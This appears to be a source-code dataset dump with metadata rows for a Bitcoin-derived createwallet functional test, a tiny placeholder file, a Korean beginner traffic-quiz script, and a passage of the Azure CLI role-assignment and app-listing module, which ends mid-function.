hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c808c4f4356cd1279f904adaa9ac62f021b2a691
| 9,874
|
py
|
Python
|
test/functional/wallet_createwallet.py
|
mrheat/doichain-core-rebase
|
975aa7d438dbdb0baf352299afb3daf70318d37b
|
[
"MIT"
] | 459
|
2015-09-25T22:46:28.000Z
|
2022-02-27T18:01:48.000Z
|
test/functional/wallet_createwallet.py
|
mrheat/doichain-core-rebase
|
975aa7d438dbdb0baf352299afb3daf70318d37b
|
[
"MIT"
] | 472
|
2015-09-17T09:42:03.000Z
|
2022-03-29T05:29:04.000Z
|
test/functional/wallet_createwallet.py
|
mrheat/doichain-core-rebase
|
975aa7d438dbdb0baf352299afb3daf70318d37b
|
[
"MIT"
] | 209
|
2015-10-04T00:49:49.000Z
|
2022-03-24T11:05:09.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2018-2021 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test createwallet arguments.
"""
from test_framework.address import key_to_p2wpkh
from test_framework.descriptors import descsum_create
from test_framework.key import ECKey
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
from test_framework.wallet_util import bytes_to_wif, generate_wif_key
class CreateWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [['-addresstype=bech32']] * self.num_nodes
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
self.generate(node, 1) # Leave IBD for sethdseed
self.nodes[0].createwallet(wallet_name='w0')
w0 = node.get_wallet_rpc('w0')
address1 = w0.getnewaddress()
self.log.info("Test disableprivatekeys creation.")
self.nodes[0].createwallet(wallet_name='w1', disable_private_keys=True)
w1 = node.get_wallet_rpc('w1')
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w1.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w1.getrawchangeaddress)
w1.importpubkey(w0.getaddressinfo(address1)['pubkey'])
self.log.info('Test that private keys cannot be imported')
eckey = ECKey()
eckey.generate()
privkey = bytes_to_wif(eckey.get_bytes())
assert_raises_rpc_error(-4, 'Cannot import private keys to a wallet with private keys disabled', w1.importprivkey, privkey)
if self.options.descriptors:
result = w1.importdescriptors([{'desc': descsum_create('wpkh(' + privkey + ')'), 'timestamp': 'now'}])
else:
result = w1.importmulti([{'scriptPubKey': {'address': key_to_p2wpkh(eckey.get_pubkey().get_bytes())}, 'timestamp': 'now', 'keys': [privkey]}])
assert not result[0]['success']
assert 'warning' not in result[0]
assert_equal(result[0]['error']['code'], -4)
assert_equal(result[0]['error']['message'], 'Cannot import private keys to a wallet with private keys disabled')
self.log.info("Test blank creation with private keys disabled.")
self.nodes[0].createwallet(wallet_name='w2', disable_private_keys=True, blank=True)
w2 = node.get_wallet_rpc('w2')
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w2.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w2.getrawchangeaddress)
w2.importpubkey(w0.getaddressinfo(address1)['pubkey'])
self.log.info("Test blank creation with private keys enabled.")
self.nodes[0].createwallet(wallet_name='w3', disable_private_keys=False, blank=True)
w3 = node.get_wallet_rpc('w3')
assert_equal(w3.getwalletinfo()['keypoolsize'], 0)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w3.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w3.getrawchangeaddress)
# Import private key
w3.importprivkey(generate_wif_key())
# Imported private keys are currently ignored by the keypool
assert_equal(w3.getwalletinfo()['keypoolsize'], 0)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w3.getnewaddress)
# Set the seed
if self.options.descriptors:
w3.importdescriptors([{
'desc': descsum_create('wpkh(tprv8ZgxMBicQKsPcwuZGKp8TeWppSuLMiLe2d9PupB14QpPeQsqoj3LneJLhGHH13xESfvASyd4EFLJvLrG8b7DrLxEuV7hpF9uUc6XruKA1Wq/0h/*)'),
'timestamp': 'now',
'active': True
},
{
'desc': descsum_create('wpkh(tprv8ZgxMBicQKsPcwuZGKp8TeWppSuLMiLe2d9PupB14QpPeQsqoj3LneJLhGHH13xESfvASyd4EFLJvLrG8b7DrLxEuV7hpF9uUc6XruKA1Wq/1h/*)'),
'timestamp': 'now',
'active': True,
'internal': True
}])
else:
w3.sethdseed()
assert_equal(w3.getwalletinfo()['keypoolsize'], 1)
w3.getnewaddress()
w3.getrawchangeaddress()
self.log.info("Test blank creation with privkeys enabled and then encryption")
self.nodes[0].createwallet(wallet_name='w4', disable_private_keys=False, blank=True)
w4 = node.get_wallet_rpc('w4')
assert_equal(w4.getwalletinfo()['keypoolsize'], 0)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w4.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w4.getrawchangeaddress)
# Encrypt the wallet. Nothing should change about the keypool
w4.encryptwallet('pass')
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w4.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w4.getrawchangeaddress)
# Now set a seed and it should work. Wallet should also be encrypted
w4.walletpassphrase('pass', 60)
if self.options.descriptors:
w4.importdescriptors([{
'desc': descsum_create('wpkh(tprv8ZgxMBicQKsPcwuZGKp8TeWppSuLMiLe2d9PupB14QpPeQsqoj3LneJLhGHH13xESfvASyd4EFLJvLrG8b7DrLxEuV7hpF9uUc6XruKA1Wq/0h/*)'),
'timestamp': 'now',
'active': True
},
{
'desc': descsum_create('wpkh(tprv8ZgxMBicQKsPcwuZGKp8TeWppSuLMiLe2d9PupB14QpPeQsqoj3LneJLhGHH13xESfvASyd4EFLJvLrG8b7DrLxEuV7hpF9uUc6XruKA1Wq/1h/*)'),
'timestamp': 'now',
'active': True,
'internal': True
}])
else:
w4.sethdseed()
w4.getnewaddress()
w4.getrawchangeaddress()
self.log.info("Test blank creation with privkeys disabled and then encryption")
self.nodes[0].createwallet(wallet_name='w5', disable_private_keys=True, blank=True)
w5 = node.get_wallet_rpc('w5')
assert_equal(w5.getwalletinfo()['keypoolsize'], 0)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w5.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w5.getrawchangeaddress)
# Encrypt the wallet
assert_raises_rpc_error(-16, "Error: wallet does not contain private keys, nothing to encrypt.", w5.encryptwallet, 'pass')
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w5.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w5.getrawchangeaddress)
self.log.info('New blank and encrypted wallets can be created')
self.nodes[0].createwallet(wallet_name='wblank', disable_private_keys=False, blank=True, passphrase='thisisapassphrase')
wblank = node.get_wallet_rpc('wblank')
assert_raises_rpc_error(-13, "Error: Please enter the wallet passphrase with walletpassphrase first.", wblank.signmessage, "needanargument", "test")
wblank.walletpassphrase('thisisapassphrase', 60)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", wblank.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", wblank.getrawchangeaddress)
self.log.info('Test creating a new encrypted wallet.')
# Born encrypted wallet is created (has keys)
self.nodes[0].createwallet(wallet_name='w6', disable_private_keys=False, blank=False, passphrase='thisisapassphrase')
w6 = node.get_wallet_rpc('w6')
assert_raises_rpc_error(-13, "Error: Please enter the wallet passphrase with walletpassphrase first.", w6.signmessage, "needanargument", "test")
w6.walletpassphrase('thisisapassphrase', 60)
w6.signmessage(w6.getnewaddress('', 'legacy'), "test")
w6.keypoolrefill(1)
# There should only be 1 key for legacy, 3 for descriptors
walletinfo = w6.getwalletinfo()
keys = 4 if self.options.descriptors else 1
assert_equal(walletinfo['keypoolsize'], keys)
assert_equal(walletinfo['keypoolsize_hd_internal'], keys)
# Allow empty passphrase, but there should be a warning
resp = self.nodes[0].createwallet(wallet_name='w7', disable_private_keys=False, blank=False, passphrase='')
assert 'Empty string given as passphrase, wallet will not be encrypted.' in resp['warning']
w7 = node.get_wallet_rpc('w7')
assert_raises_rpc_error(-15, 'Error: running with an unencrypted wallet, but walletpassphrase was called.', w7.walletpassphrase, '', 60)
self.log.info('Test making a wallet with avoid reuse flag')
self.nodes[0].createwallet('w8', False, False, '', True) # Use positional arguments to check for bug where avoid_reuse could not be set for wallets without needing them to be encrypted
w8 = node.get_wallet_rpc('w8')
assert_raises_rpc_error(-15, 'Error: running with an unencrypted wallet, but walletpassphrase was called.', w7.walletpassphrase, '', 60)
assert_equal(w8.getwalletinfo()["avoid_reuse"], True)
self.log.info('Using a passphrase with private keys disabled returns error')
assert_raises_rpc_error(-4, 'Passphrase provided but private keys are disabled. A passphrase is only used to encrypt private keys, so cannot be used for wallets with private keys disabled.', self.nodes[0].createwallet, wallet_name='w9', disable_private_keys=True, passphrase='thisisapassphrase')
if __name__ == '__main__':
CreateWalletTest().main()
| 58.082353
| 303
| 0.691513
|
49317b1e826dcbe7dd96e4f9f1dc02a6bf0487fa
| 7
|
py
|
Python
|
example/scikitlogistic/cloudmesh_ai/test.py
|
cloudmesh-community/fa19-516-174
|
1b1aed0dcb4aa2fbe70de86a281c089a75f7aa72
|
[
"Apache-2.0"
] | null | null | null |
example/scikitlogistic/cloudmesh_ai/test.py
|
cloudmesh-community/fa19-516-174
|
1b1aed0dcb4aa2fbe70de86a281c089a75f7aa72
|
[
"Apache-2.0"
] | null | null | null |
example/scikitlogistic/cloudmesh_ai/test.py
|
cloudmesh-community/fa19-516-174
|
1b1aed0dcb4aa2fbe70de86a281c089a75f7aa72
|
[
"Apache-2.0"
] | null | null | null |
file
| 1.75
| 4
| 0.571429
|
fe4462e7e739295a8ba63644ced68f486b8ae992
| 767
|
py
|
Python
|
game.py
|
hyemi0/enjoy_python
|
434e332d014d116c3f2f82b9a55440e9c40e6934
|
[
"MIT"
] | null | null | null |
game.py
|
hyemi0/enjoy_python
|
434e332d014d116c3f2f82b9a55440e9c40e6934
|
[
"MIT"
] | null | null | null |
game.py
|
hyemi0/enjoy_python
|
434e332d014d116c3f2f82b9a55440e9c40e6934
|
[
"MIT"
] | null | null | null |
#포인트 50으로 시작 !
print("신호등에 걸리셨습니다. 기다리시겠습니까?")
a=input("입력해보세요: ")
if a==1: #a가 1일때
print("1번 기다린다. 30초 후에 초록불로 바뀝니다.")
elif a==2: #a가 2일때
print("2번 기다리지 않는다.신호위반입니다. 기다리세요. 30 초 후에 초록불로 바뀝니다.")
else: #a가 1이 아닐때
print("잘못된 선택입니다.")
#score +20
#score -10
print("초록불로 바뀌었습니다 출발하세요.")
print("cctv 단속 구간입니다. 30km이상으로 운전하면 벌금입니다. 30km이상으로 운전하시겠습니까?")
print(" 30km이하로 달린다. 2번 : 30km 이상으로 달린다.")
a=input("입력해보세요: ")
if a==1:
print("통과입니다.")
else:
print("벌금 30만원입니다.")
#1번 입력했을 경우
#포인트 +30
#2번 입력했을 경우
#포인트 -30
print("서행하세요. 앞에 장애물이 있습니다. 피해가겠습니까?")
print("1번 : 피해간다. 2번 : 그냥간다")
print("===========")
a=input("입력해보세요: ")
print("======{}=====".format(type(a)))
if a=="1":
print("SUCCESS! ! ! ") #1번 입력했을 경우 ==1
else:
print("게임이 끝났습니다. 다시 도전하시겠습니까?") #2번 입력했을 경우
| 21.305556
| 63
| 0.611473
|
f7991d6350eb0c86d8b2b480cac642c219fac4db
| 66,393
|
py
|
Python
|
src/command_modules/azure-cli-role/azure/cli/command_modules/role/custom.py
|
srinathnarayanan/azure-cli
|
b98bddc8dd18e6cb15fc44a6dc160b02a0bd255a
|
[
"MIT"
] | null | null | null |
src/command_modules/azure-cli-role/azure/cli/command_modules/role/custom.py
|
srinathnarayanan/azure-cli
|
b98bddc8dd18e6cb15fc44a6dc160b02a0bd255a
|
[
"MIT"
] | null | null | null |
src/command_modules/azure-cli-role/azure/cli/command_modules/role/custom.py
|
srinathnarayanan/azure-cli
|
b98bddc8dd18e6cb15fc44a6dc160b02a0bd255a
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import base64
import datetime
import json
import re
import os
import uuid
import itertools
from dateutil.relativedelta import relativedelta
import dateutil.parser
from knack.log import get_logger
from knack.util import CLIError, todict
from msrest.serialization import TZ_UTC
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.profiles import ResourceType, get_api_version
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.util import get_file_json, shell_safe_json_parse
from azure.graphrbac.models import (ApplicationCreateParameters, ApplicationUpdateParameters, PasswordCredential,
KeyCredential, UserCreateParameters, PasswordProfile,
ServicePrincipalCreateParameters, RequiredResourceAccess,
ResourceAccess, GroupCreateParameters, CheckGroupMembershipParameters)
from ._client_factory import _auth_client_factory, _graph_client_factory
from ._multi_api_adaptor import MultiAPIAdaptor
logger = get_logger(__name__)
# pylint: disable=too-many-lines
def list_role_definitions(cmd, name=None, resource_group_name=None, scope=None,
custom_role_only=False):
definitions_client = _auth_client_factory(cmd.cli_ctx, scope).role_definitions
scope = _build_role_scope(resource_group_name, scope,
definitions_client.config.subscription_id)
return _search_role_definitions(cmd.cli_ctx, definitions_client, name, scope, custom_role_only)
def create_role_definition(cmd, role_definition):
return _create_update_role_definition(cmd, role_definition, for_update=False)
def update_role_definition(cmd, role_definition):
return _create_update_role_definition(cmd, role_definition, for_update=True)
def _create_update_role_definition(cmd, role_definition, for_update):
definitions_client = _auth_client_factory(cmd.cli_ctx).role_definitions
if os.path.exists(role_definition):
role_definition = get_file_json(role_definition)
else:
role_definition = shell_safe_json_parse(role_definition)
if not isinstance(role_definition, dict):
raise CLIError('Invalid role defintion. A valid dictionary JSON representation is expected.')
# to workaround service defects, ensure property names are camel case
names = [p for p in role_definition if p[:1].isupper()]
for n in names:
new_name = n[:1].lower() + n[1:]
role_definition[new_name] = role_definition.pop(n)
role_name = role_definition.get('name', None)
if not role_name:
raise CLIError("please provide role name")
if for_update: # for update, we need to use guid style unique name
scopes_in_definition = role_definition.get('assignableScopes', None)
scope = (scopes_in_definition[0] if scopes_in_definition else
'/subscriptions/' + definitions_client.config.subscription_id)
matched = _search_role_definitions(cmd.cli_ctx, definitions_client, role_name, scope)
if len(matched) != 1:
raise CLIError('Please provide the unique logic name of an existing role')
role_definition['name'] = matched[0].name
# ensure correct logical name and guid name. For update we accept both
worker = MultiAPIAdaptor(cmd.cli_ctx)
role_name = worker.get_role_property(matched[0], 'role_name')
role_id = matched[0].name
else:
role_id = _gen_guid()
if not for_update and 'assignableScopes' not in role_definition:
raise CLIError("please provide 'assignableScopes'")
worker = MultiAPIAdaptor(cmd.cli_ctx)
return worker.create_role_definition(definitions_client, role_name, role_id, role_definition)
def delete_role_definition(cmd, name, resource_group_name=None, scope=None,
custom_role_only=False):
definitions_client = _auth_client_factory(cmd.cli_ctx, scope).role_definitions
scope = _build_role_scope(resource_group_name, scope,
definitions_client.config.subscription_id)
roles = _search_role_definitions(cmd.cli_ctx, definitions_client, name, scope, custom_role_only)
for r in roles:
definitions_client.delete(role_definition_id=r.name, scope=scope)
def _search_role_definitions(cli_ctx, definitions_client, name, scope, custom_role_only=False):
roles = list(definitions_client.list(scope))
worker = MultiAPIAdaptor(cli_ctx)
if name:
roles = [r for r in roles if r.name == name or worker.get_role_property(r, 'role_name') == name]
if custom_role_only:
roles = [r for r in roles if worker.get_role_property(r, 'role_type') == 'CustomRole']
return roles
def create_role_assignment(cmd, role, assignee=None, assignee_object_id=None, resource_group_name=None,
scope=None):
if bool(assignee) == bool(assignee_object_id):
raise CLIError('usage error: --assignee STRING | --assignee-object-id GUID')
return _create_role_assignment(cmd.cli_ctx, role, assignee or assignee_object_id, resource_group_name, scope,
resolve_assignee=(not assignee_object_id))
def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None,
resolve_assignee=True):
factory = _auth_client_factory(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
worker = MultiAPIAdaptor(cli_ctx)
return worker.create_role_assignment(assignments_client, _gen_guid(), role_id, object_id, scope)
def list_role_assignments(cmd, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False,
show_all=False, include_groups=False, include_classic_administrators=False):
'''
:param include_groups: include extra assignments to the groups of which the user is a
member(transitively).
'''
graph_client = _graph_client_factory(cmd.cli_ctx)
factory = _auth_client_factory(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
if show_all:
if resource_group_name or scope:
raise CLIError('group or scope are not required when --all is used')
scope = None
else:
scope = _build_role_scope(resource_group_name, scope,
definitions_client.config.subscription_id)
assignments = _search_role_assignments(cmd.cli_ctx, assignments_client, definitions_client,
scope, assignee, role,
include_inherited, include_groups)
results = todict(assignments) if assignments else []
if include_classic_administrators:
results += _backfill_assignments_for_co_admins(cmd.cli_ctx, factory, assignee)
if not results:
return []
# 1. fill in logic names to get things understandable.
# (it's possible that associated roles and principals were deleted, and we just do nothing.)
# 2. fill in role names
role_defs = list(definitions_client.list(
scope=scope or ('/subscriptions/' + definitions_client.config.subscription_id)))
worker = MultiAPIAdaptor(cmd.cli_ctx)
role_dics = {i.id: worker.get_role_property(i, 'role_name') for i in role_defs}
for i in results:
if not i.get('roleDefinitionName'):
if role_dics.get(worker.get_role_property(i, 'roleDefinitionId')):
worker.set_role_property(i, 'roleDefinitionName',
role_dics[worker.get_role_property(i, 'roleDefinitionId')])
else:
i['roleDefinitionName'] = None # the role definition might have been deleted
# fill in principal names
principal_ids = set(worker.get_role_property(i, 'principalId')
for i in results if worker.get_role_property(i, 'principalId'))
if principal_ids:
try:
principals = _get_object_stubs(graph_client, principal_ids)
principal_dics = {i.object_id: _get_displayable_name(i) for i in principals}
for i in [r for r in results if not r.get('principalName')]:
i['principalName'] = ''
if principal_dics.get(worker.get_role_property(i, 'principalId')):
worker.set_role_property(i, 'principalName',
principal_dics[worker.get_role_property(i, 'principalId')])
except (CloudError, GraphErrorException) as ex:
# failure on resolving principal due to graph permission should not fail the whole thing
logger.info("Failed to resolve graph object information per error '%s'", ex)
for r in results:
if not r.get('additionalProperties'): # remove the useless "additionalProperties"
r.pop('additionalProperties', None)
return results
def _get_assignment_events(cli_ctx, start_time=None, end_time=None):
from azure.mgmt.monitor import MonitorManagementClient
from azure.cli.core.commands.client_factory import get_mgmt_service_client
client = get_mgmt_service_client(cli_ctx, MonitorManagementClient)
DATE_TIME_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
if end_time:
try:
end_time = datetime.datetime.strptime(end_time, DATE_TIME_FORMAT)
except ValueError:
raise CLIError("Input '{}' is not valid datetime. Valid example: 2000-12-31T12:59:59Z".format(end_time))
else:
end_time = datetime.datetime.utcnow()
if start_time:
try:
start_time = datetime.datetime.strptime(start_time, DATE_TIME_FORMAT)
if start_time >= end_time:
raise CLIError("Start time cannot be later than end time.")
except ValueError:
raise CLIError("Input '{}' is not valid datetime. Valid example: 2000-12-31T12:59:59Z".format(start_time))
else:
start_time = end_time - datetime.timedelta(hours=1)
time_filter = 'eventTimestamp ge {} and eventTimestamp le {}'.format(start_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
end_time.strftime('%Y-%m-%dT%H:%M:%SZ'))
# set time range filter
odata_filters = 'resourceProvider eq Microsoft.Authorization and {}'.format(time_filter)
activity_log = list(client.activity_logs.list(filter=odata_filters))
start_events, end_events, offline_events = {}, {}, []
for l in activity_log:
if l.http_request:
if l.status.value == 'Started':
start_events[l.operation_id] = l
else:
end_events[l.operation_id] = l
elif l.event_name and l.event_name.value.lower() == 'classicadministrators':
offline_events.append(l)
return start_events, end_events, offline_events, client
# A custom command around 'monitoring' events to produce understandable output for RBAC audit, a common scenario.
def list_role_assignment_change_logs(cmd, start_time=None, end_time=None):
# pylint: disable=too-many-nested-blocks, too-many-statements
result = []
worker = MultiAPIAdaptor(cmd.cli_ctx)
start_events, end_events, offline_events, client = _get_assignment_events(cmd.cli_ctx, start_time, end_time)
role_defs = {d.id: [worker.get_role_property(d, 'role_name'),
d.id.split('/')[-1]] for d in list_role_definitions(cmd)}
for op_id in start_events:
e = end_events.get(op_id, None)
if not e:
continue
entry = {}
op = e.operation_name and e.operation_name.value
if (op.lower().startswith('microsoft.authorization/roleassignments') and e.status.value == 'Succeeded'):
s, payload = start_events[op_id], None
entry = dict.fromkeys(
['principalId', 'principalName', 'scope', 'scopeName', 'scopeType', 'roleDefinitionId', 'roleName'],
None)
entry['timestamp'], entry['caller'] = e.event_timestamp, s.caller
if s.http_request:
if s.http_request.method == 'PUT':
# 'requestbody' has a wrong camel-case. Should be 'requestBody'
payload = s.properties and s.properties.get('requestbody')
entry['action'] = 'Granted'
entry['scope'] = e.authorization.scope
elif s.http_request.method == 'DELETE':
payload = e.properties and e.properties.get('responseBody')
entry['action'] = 'Revoked'
if payload:
try:
payload = json.loads(payload)
except ValueError:
pass
if payload:
payload = payload['properties']
entry['principalId'] = payload['principalId']
if not entry['scope']:
entry['scope'] = payload['scope']
if entry['scope']:
index = entry['scope'].lower().find('/providers/microsoft.authorization')
if index != -1:
entry['scope'] = entry['scope'][:index]
parts = list(filter(None, entry['scope'].split('/')))
entry['scopeName'] = parts[-1]
if len(parts) < 3:
entry['scopeType'] = 'Subscription'
elif len(parts) < 5:
entry['scopeType'] = 'Resource group'
else:
entry['scopeType'] = 'Resource'
entry['roleDefinitionId'] = role_defs[payload['roleDefinitionId']][1]
entry['roleName'] = role_defs[payload['roleDefinitionId']][0]
result.append(entry)
# Fill in logical user/sp names as guid principal-id not readable
principal_ids = set([x['principalId'] for x in result if x['principalId']])
if principal_ids:
graph_client = _graph_client_factory(cmd.cli_ctx)
stubs = _get_object_stubs(graph_client, principal_ids)
principal_dics = {i.object_id: _get_displayable_name(i) for i in stubs}
if principal_dics:
for e in result:
e['principalName'] = principal_dics.get(e['principalId'], None)
offline_events = [x for x in offline_events if (x.status and x.status.value == 'Succeeded' and x.operation_name and
x.operation_name.value.lower().startswith(
'microsoft.authorization/classicadministrators'))]
for e in offline_events:
entry = {
'timestamp': e.event_timestamp,
'caller': 'Subscription Admin',
'roleDefinitionId': None,
'principalId': None,
'principalType': 'User',
'scope': '/subscriptions/' + client.config.subscription_id,
'scopeType': 'Subscription',
'scopeName': client.config.subscription_id,
}
if e.properties:
entry['principalName'] = e.properties.get('adminEmail')
entry['roleName'] = e.properties.get('adminType')
result.append(entry)
return result
def _backfill_assignments_for_co_admins(cli_ctx, auth_client, assignee=None):
worker = MultiAPIAdaptor(cli_ctx)
co_admins = auth_client.classic_administrators.list() # known swagger bug on api-version handling
co_admins = [x for x in co_admins if x.email_address]
graph_client = _graph_client_factory(cli_ctx)
if assignee: # apply assignee filter if applicable
if _is_guid(assignee):
try:
result = _get_object_stubs(graph_client, [assignee])
if not result:
return []
assignee = _get_displayable_name(result[0]).lower()
except ValueError:
pass
co_admins = [x for x in co_admins if assignee == x.email_address.lower()]
if not co_admins:
return []
result, users = [], []
for i in range(0, len(co_admins), 10): # graph allows up to 10 query filters, so split into chunks here
upn_queries = ["userPrincipalName eq '{}'".format(x.email_address)
for x in co_admins[i:i + 10]]
temp = list(list_users(graph_client.users, query_filter=' or '.join(upn_queries)))
users += temp
upns = {u.user_principal_name: u.object_id for u in users}
for admin in co_admins:
na_text = 'NA(classic admins)'
email = admin.email_address
result.append({
'id': na_text,
'name': na_text,
})
properties = {
'principalId': upns.get(email),
'principalName': email,
'roleDefinitionName': admin.role,
'roleDefinitionId': 'NA(classic admin role)',
'scope': '/subscriptions/' + auth_client.config.subscription_id
}
if worker.old_api:
result[-1]['properties'] = properties
else:
result[-1].update(properties)
return result
def _get_displayable_name(graph_object):
if getattr(graph_object, 'user_principal_name', None):
return graph_object.user_principal_name
elif getattr(graph_object, 'service_principal_names', None):
return graph_object.service_principal_names[0]
return graph_object.display_name or ''
def delete_role_assignments(cmd, ids=None, assignee=None, role=None,
resource_group_name=None, scope=None, include_inherited=False):
factory = _auth_client_factory(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cmd.cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
else:
raise CLIError('No matched assignments were found to delete')
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee, fallback_to_object_id=True)
# combining filters is unsupported, so we pick the best, and do limited maunal filtering
if assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
elif scope:
assignments = list(assignments_client.list_for_scope(scope=scope, filter='atScope()'))
else:
assignments = list(assignments_client.list())
worker = MultiAPIAdaptor(cli_ctx)
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(worker.get_role_property(a, 'scope'), scope, re.I) or
worker.get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if worker.get_role_property(i, 'role_definition_id') == role_id]
return assignments
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
if re.match(r'/subscriptions/.+/providers/Microsoft.Authorization/roleDefinitions/',
role, re.I):
role_id = role
else:
if _is_guid(role):
role_id = '/subscriptions/{}/providers/Microsoft.Authorization/roleDefinitions/{}'.format(
definitions_client.config.subscription_id, role)
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
elif len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def list_apps(cmd, app_id=None, display_name=None, identifier_uri=None, query_filter=None, include_all=None,
show_mine=None):
client = _graph_client_factory(cmd.cli_ctx)
if show_mine:
return list_owned_objects(client.signed_in_user, 'application')
sub_filters = []
if query_filter:
sub_filters.append(query_filter)
if app_id:
sub_filters.append("appId eq '{}'".format(app_id))
if display_name:
sub_filters.append("startswith(displayName,'{}')".format(display_name))
if identifier_uri:
sub_filters.append("identifierUris/any(s:s eq '{}')".format(identifier_uri))
result = client.applications.list(filter=(' and '.join(sub_filters)))
if sub_filters or include_all:
return result
else:
result = list(itertools.islice(result, 101))
if len(result) == 101:
logger.warning("The result is not complete. You can still use '--all' to get all of them with"
" long latency expected, or provide a filter through command arguments")
return result[:100]
def list_application_owners(cmd, identifier):
client = _graph_client_factory(cmd.cli_ctx).applications
return client.list_owners(_resolve_application(client, identifier))
def add_application_owner(cmd, owner_object_id, identifier):
graph_client = _graph_client_factory(cmd.cli_ctx)
owner_url = _get_owner_url(cmd.cli_ctx, owner_object_id)
return graph_client.applications.add_owner(_resolve_application(graph_client.applications, identifier), owner_url)
def remove_application_owner(cmd, owner_object_id, identifier):
client = _graph_client_factory(cmd.cli_ctx).applications
return client.remove_owner(_resolve_application(client, identifier), owner_object_id)
def list_sps(cmd, spn=None, display_name=None, query_filter=None, show_mine=None, include_all=None):
client = _graph_client_factory(cmd.cli_ctx)
if show_mine:
return list_owned_objects(client.signed_in_user, 'servicePrincipal')
sub_filters = []
if query_filter:
